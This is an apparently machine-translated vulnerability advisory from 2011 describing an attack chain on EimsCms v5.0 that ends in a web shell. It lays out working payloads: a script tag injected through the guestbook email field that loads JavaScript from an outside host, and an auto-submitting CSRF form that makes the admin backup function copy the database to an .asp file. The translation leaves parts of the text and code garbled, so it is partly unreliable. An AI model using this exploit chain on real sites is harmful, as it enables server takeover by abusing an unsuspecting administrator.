EimsCms v5. 0 XSS+CSRF=GetShell-a vulnerability warning-the black bar safety net

2011-01-29T00:00:00
ID MYHACK58:62201128968
Type myhack58
Reporter 佚名
Modified 2011-01-29T00:00:00

Description

|

EimsCms v5. 0 XSS+CSRF=GetShell

作者 :B0mbErM@n

Time:2011-01-28

------ GetShell-----

[1] in the Book. asp the mailbox at the fill in the word,submission [2] in the Book. the asp mailbox fillXSSstatement in the CSRF [3] wait for the administrator to triggerXSSstatement,and then words connected to the bem. asp [Requirements] the default background management Directory/database [Note] the management triggerXSSis in the background view comments

\ ------ X S S-----

Book. asp In the email writeXSSstatement can be WithXSScall CSRF,for example the CSRF to go to JS then use <SCRIPT SRC=http://5 2 1. im/xss. js></SCRIPT>

\ ----- CSRF-----

<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart"> <input name="olddata" type="text" id="olddata" value="../Data/eimsCMS. mdb" size="4 5" readonly> <input name="newdata" type="text" id="newdata" size="4 5" value="../bem. asp"> <input type="submit" name="Submit" value="Start Backup" id="bem" /> </form> <script> document. getElementByIdx_x('bem'). click(); </script>

\ ----- Analysis-----

Not to Book. the asp mailbox, etc. for the symbols to escape Unfiltered submission statement